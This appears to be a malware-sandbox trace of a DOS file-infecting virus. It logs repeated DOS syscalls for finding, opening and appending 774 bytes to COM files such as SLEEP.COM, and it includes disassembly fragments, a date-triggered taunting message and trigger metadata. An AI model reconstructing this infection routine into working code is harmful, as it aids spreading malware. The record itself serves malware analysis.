2018-12-25T11:59:08.959672272Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:08.96997362Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:08.977670891Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:08.984969324Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:08.986881447Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.00615647Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.013628073Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:09.016642444Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:09.018072763Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:09.021254327Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:09.037387235Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:09.038978593Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:09.058562708Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.08259949Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.086955382Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.094876539Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.102941011Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.105004136Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.124581044Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.131864472Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:09.135012737Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:09.137543954Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:09.140291175Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:09.154611657Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:09.156877764Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:09.169741456Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.18586047Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.188692331Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.195808848Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.202645875Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.204666293Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.211076324Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.216371337Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:09.219510549Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:09.222725692Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:09.225840503Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:09.243347687Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:09.24620454Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:09.248498415Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.253508388Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.257226279Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.264397635Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.271219376Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.274066968Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.31078549Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.319041961Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:09.322242701Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:09.324085727Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:09.326756596Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:09.342505614Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:09.344707062Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:09.363374846Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.379204626Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.383083205Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.390297533Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.397281698Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.39959505Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.418712002Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.424759321Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:09.427596288Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:09.429176338Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:09.431953388Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:09.441755694Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:09.444088293Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:09.452980771Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.461565006Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.464335591Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.468592364Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.470409231Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.471991205Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.473785769Z 59 PC: 12b1c | Change current directory
2018-12-25T11:59:09.476455206Z 42 PC: 12b22 | Get date 0x12b22: cmp dl, 0xd
0x12b25: jge 0x12b29
0x12b27: jmp 0x12b2e
0x12b29: mov ax, 0x4c00
0x12b2c: int 0x21
0x12b2e: mov ah, 9
0x12b30: lea dx, word ptr [bp + 0x33c]
0x12b34: int 0x21
0x12b36: mov ax, 0x2524
0x12b39: lds dx, ptr cs:[bp + 0x4a9]
0x12b3e: int 0x21
0x12b40: push cs
0x12b41: pop ds
0x12b42: lea dx, word ptr [bp + 0x425]
0x12b46: mov ah, 0x3b
0x12b48: int 0x21
0x12b4a: mov dx, 0x80
0x12b4d: call 0x12cc1
0x12b50: cmp sp, 0x4448
0x12b54: je 0x12b57
2018-12-25T11:59:09.478664958Z 9 PC: 12b36 | Display string (String= 'I am he, the bornless one, the fallen angel watching you ! (C) Dread Lord. You are the real dead one now ... ')
2018-12-25T11:59:09.484367345Z 37 PC: 12b40 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:09.485769685Z 59 PC: 12b4a | Change current directory
2018-12-25T11:59:09.487488312Z 26 PC: 12cc5 | Set disk transfer address (See above)
2018-12-25T11:59:09.488478102Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":6325,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:09.011902531Z 26 PC: 12cc5 | Set disk transfer address
2018-12-25T11:59:09.013619493Z 53 PC: 12ae8 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:09.01492133Z 37 PC: 12afa | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:09.016219349Z 71 PC: 12b06 | Get current directory
2018-12-25T11:59:09.024782674Z 78 PC: 12b89 | Find first file
2018-12-25T11:59:09.031336192Z 78 PC: 12b89 | Find first file (See above)
2018-12-25T11:59:09.037749337Z 61 PC: 12cce | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:09.044893471Z 63 PC: 12ba4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:09.052032925Z 62 PC: 12ba8 | Close file
2018-12-25T11:59:09.054003117Z 67 PC: 12cd9 | Get or set file attributes
2018-12-25T11:59:09.423143993Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.438081625Z 64 PC: 12c82 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:09.445664573Z 66 PC: 12cc0 | Move file pointer
2018-12-25T11:59:09.447126868Z 44 PC: 12c8d | Get time 0x12c8d: cmp dh, 0
0x12c90: je 0x12c89
0x12c92: mov byte ptr cs:[bp + 0x408], dh
0x12c97: call 0x12d60
0x12c9a: mov ax, 0x5701
0x12c9d: mov cx, word ptr cs:[bp + 0x47b]
0x12ca2: mov dx, word ptr cs:[bp + 0x47d]
0x12ca7: int 0x21
0x12ca9: mov ah, 0x3e
0x12cab: int 0x21
0x12cad: xor cx, cx
0x12caf: mov cl, byte ptr cs:[bp + 0x47a]
0x12cb4: call 0x12cd0
0x12cb7: ret
0x12cb8: mov ah, 0x42
0x12cba: xor cx, cx
0x12cbc: xor dx, dx
0x12cbe: int 0x21
0x12cc0: ret
0x12cc1: mov ah, 0x1a
2018-12-25T11:59:09.450415672Z 64 PC: 12dbd | Write file or device (Write 774 bytes on handle 5)
2018-12-25T11:59:09.460309263Z 87 PC: 12ca9 | Get or set file date and time
2018-12-25T11:59:09.461584813Z 62 PC: 12cad | Close file
2018-12-25T11:59:09.468397893Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.475591695Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.477718185Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.484153365Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.48872234Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.49007331Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.503096684Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.513979654Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:09.516467419Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:09.51801048Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:09.520836441Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:09.526887016Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:09.528157825Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:09.534529631Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.542029996Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.545923942Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.564083256Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.571668553Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.573637197Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.584920695Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.592691131Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:09.596284928Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:09.599100996Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:09.60278076Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:09.612401461Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:09.614157707Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:09.622200351Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.63404922Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.637344138Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.645345157Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.652947504Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.654844141Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.666167256Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.673498297Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:09.676524277Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:09.678725818Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:09.681479049Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:09.690658897Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:09.693682982Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:09.701998693Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.713101448Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.716592213Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.723778788Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.730688683Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.73368517Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.73839713Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.743590983Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:09.747358063Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:09.749216102Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:09.751972922Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:09.769237271Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:09.770884896Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:09.772811467Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.777444798Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.781345283Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.788675885Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.795502363Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.798204785Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.809405824Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.817205491Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:09.821769031Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:09.823351787Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:09.826900106Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:09.83791001Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:09.839733836Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:09.849111998Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.861566718Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.863709336Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.868067633Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.875344097Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.8773601Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.888685486Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.896016702Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:09.899403537Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:09.900932814Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:09.903644562Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:09.913306571Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:09.914924497Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:09.923102285Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.934447308Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.937647132Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.945154375Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.953179133Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.955205501Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.957815414Z 59 PC: 12b1c | Change current directory
2018-12-25T11:59:09.962689128Z 42 PC: 12b22 | Get date 0x12b22: cmp dl, 0xd
0x12b25: jge 0x12b29
0x12b27: jmp 0x12b2e
0x12b29: mov ax, 0x4c00
0x12b2c: int 0x21
0x12b2e: mov ah, 9
0x12b30: lea dx, word ptr [bp + 0x33c]
0x12b34: int 0x21
0x12b36: mov ax, 0x2524
0x12b39: lds dx, ptr cs:[bp + 0x4a9]
0x12b3e: int 0x21
0x12b40: push cs
0x12b41: pop ds
0x12b42: lea dx, word ptr [bp + 0x425]
0x12b46: mov ah, 0x3b
0x12b48: int 0x21
0x12b4a: mov dx, 0x80
0x12b4d: call 0x12cc1
0x12b50: cmp sp, 0x4448
0x12b54: je 0x12b57
2018-12-25T11:59:09.965382019Z 9 PC: 12b36 | Display string (String= 'I am he, the bornless one, the fallen angel watching you ! (C) Dread Lord. You are the real dead one now ... ')
2018-12-25T11:59:09.976184273Z 37 PC: 12b40 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:09.978281735Z 59 PC: 12b4a | Change current directory
2018-12-25T11:59:09.980545197Z 26 PC: 12cc5 | Set disk transfer address (See above)
2018-12-25T11:59:09.981730064Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":6325,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:09.071739839Z 26 PC: 12cc5 | Set disk transfer address
2018-12-25T11:59:09.073163093Z 53 PC: 12ae8 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:09.074181704Z 37 PC: 12afa | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:09.075068233Z 71 PC: 12b06 | Get current directory
2018-12-25T11:59:09.078301137Z 78 PC: 12b89 | Find first file
2018-12-25T11:59:09.084198038Z 78 PC: 12b89 | Find first file (See above)
2018-12-25T11:59:09.090383854Z 61 PC: 12cce | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:09.096980821Z 63 PC: 12ba4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:09.105522248Z 62 PC: 12ba8 | Close file
2018-12-25T11:59:09.106693152Z 67 PC: 12cd9 | Get or set file attributes
2018-12-25T11:59:09.558210703Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.565274042Z 64 PC: 12c82 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:09.568667359Z 66 PC: 12cc0 | Move file pointer
2018-12-25T11:59:09.570400542Z 44 PC: 12c8d | Get time 0x12c8d: cmp dh, 0
0x12c90: je 0x12c89
0x12c92: mov byte ptr cs:[bp + 0x408], dh
0x12c97: call 0x12d60
0x12c9a: mov ax, 0x5701
0x12c9d: mov cx, word ptr cs:[bp + 0x47b]
0x12ca2: mov dx, word ptr cs:[bp + 0x47d]
0x12ca7: int 0x21
0x12ca9: mov ah, 0x3e
0x12cab: int 0x21
0x12cad: xor cx, cx
0x12caf: mov cl, byte ptr cs:[bp + 0x47a]
0x12cb4: call 0x12cd0
0x12cb7: ret
0x12cb8: mov ah, 0x42
0x12cba: xor cx, cx
0x12cbc: xor dx, dx
0x12cbe: int 0x21
0x12cc0: ret
0x12cc1: mov ah, 0x1a
2018-12-25T11:59:09.574648014Z 64 PC: 12dbd | Write file or device (Write 774 bytes on handle 5)
2018-12-25T11:59:09.583538651Z 87 PC: 12ca9 | Get or set file date and time
2018-12-25T11:59:09.585010755Z 62 PC: 12cad | Close file
2018-12-25T11:59:09.596253135Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.607308362Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:09.61045386Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.622683436Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:09.62937594Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:09.631095204Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:09.776593712Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.78316527Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:09.786176926Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:09.788534905Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:09.791151925Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.015297369Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.017001355Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.235173155Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.285817667Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.290257303Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.302735762Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.31021966Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.313419505Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.323513732Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.33474173Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.339430491Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.341434622Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.344248815Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.353753072Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.356140336Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.363899555Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.374075227Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.378519471Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.385186119Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.391828917Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.395209839Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.405772214Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.412763276Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.416899977Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.418415634Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.421035866Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.430671635Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.432360969Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.439641779Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.450088214Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.452905677Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.459615442Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.466777515Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.469597295Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.474159529Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.47971762Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.482480295Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.483848651Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.486515582Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.500667028Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.502342193Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.505235489Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.513778202Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.516320501Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.522947441Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.529801293Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.531870943Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.542456681Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.549861212Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.552902067Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.554786211Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.557784917Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.567925417Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.569383749Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.577490103Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.587350884Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.590300571Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.598460783Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.605263202Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.606968481Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.616893766Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.623845593Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.626489813Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.628449664Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.630845773Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.639180784Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.641601556Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.649478916Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.659298277Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.663583011Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.677219462Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.683717216Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.686103289Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.688567067Z 59 PC: 12b1c | Change current directory
2018-12-25T11:59:10.692909549Z 42 PC: 12b22 | Get date 0x12b22: cmp dl, 0xd
0x12b25: jge 0x12b29
0x12b27: jmp 0x12b2e
0x12b29: mov ax, 0x4c00
0x12b2c: int 0x21
0x12b2e: mov ah, 9
0x12b30: lea dx, word ptr [bp + 0x33c]
0x12b34: int 0x21
0x12b36: mov ax, 0x2524
0x12b39: lds dx, ptr cs:[bp + 0x4a9]
0x12b3e: int 0x21
0x12b40: push cs
0x12b41: pop ds
0x12b42: lea dx, word ptr [bp + 0x425]
0x12b46: mov ah, 0x3b
0x12b48: int 0x21
0x12b4a: mov dx, 0x80
0x12b4d: call 0x12cc1
0x12b50: cmp sp, 0x4448
0x12b54: je 0x12b57
2018-12-25T11:59:10.6964506Z 9 PC: 12b36 | Display string (String= 'I am he, the bornless one, the fallen angel watching you ! (C) Dread Lord. You are the real dead one now ... ')
2018-12-25T11:59:10.705754217Z 37 PC: 12b40 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:10.706953551Z 59 PC: 12b4a | Change current directory
2018-12-25T11:59:10.709768865Z 26 PC: 12cc5 | Set disk transfer address (See above)
2018-12-25T11:59:10.710903953Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":6325,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:09.229731405Z 26 PC: 12cc5 | Set disk transfer address
2018-12-25T11:59:09.23104449Z 53 PC: 12ae8 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:09.232807361Z 37 PC: 12afa | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:09.234239004Z 71 PC: 12b06 | Get current directory
2018-12-25T11:59:09.238721972Z 78 PC: 12b89 | Find first file
2018-12-25T11:59:09.246011532Z 78 PC: 12b89 | Find first file (See above)
2018-12-25T11:59:09.252955286Z 61 PC: 12cce | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:09.26043919Z 63 PC: 12ba4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:09.267746126Z 62 PC: 12ba8 | Close file
2018-12-25T11:59:09.269735777Z 67 PC: 12cd9 | Get or set file attributes
2018-12-25T11:59:09.42381057Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:09.432544676Z 64 PC: 12c82 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:09.435585629Z 66 PC: 12cc0 | Move file pointer
2018-12-25T11:59:09.437237812Z 44 PC: 12c8d | Get time 0x12c8d: cmp dh, 0
0x12c90: je 0x12c89
0x12c92: mov byte ptr cs:[bp + 0x408], dh
0x12c97: call 0x12d60
0x12c9a: mov ax, 0x5701
0x12c9d: mov cx, word ptr cs:[bp + 0x47b]
0x12ca2: mov dx, word ptr cs:[bp + 0x47d]
0x12ca7: int 0x21
0x12ca9: mov ah, 0x3e
0x12cab: int 0x21
0x12cad: xor cx, cx
0x12caf: mov cl, byte ptr cs:[bp + 0x47a]
0x12cb4: call 0x12cd0
0x12cb7: ret
0x12cb8: mov ah, 0x42
0x12cba: xor cx, cx
0x12cbc: xor dx, dx
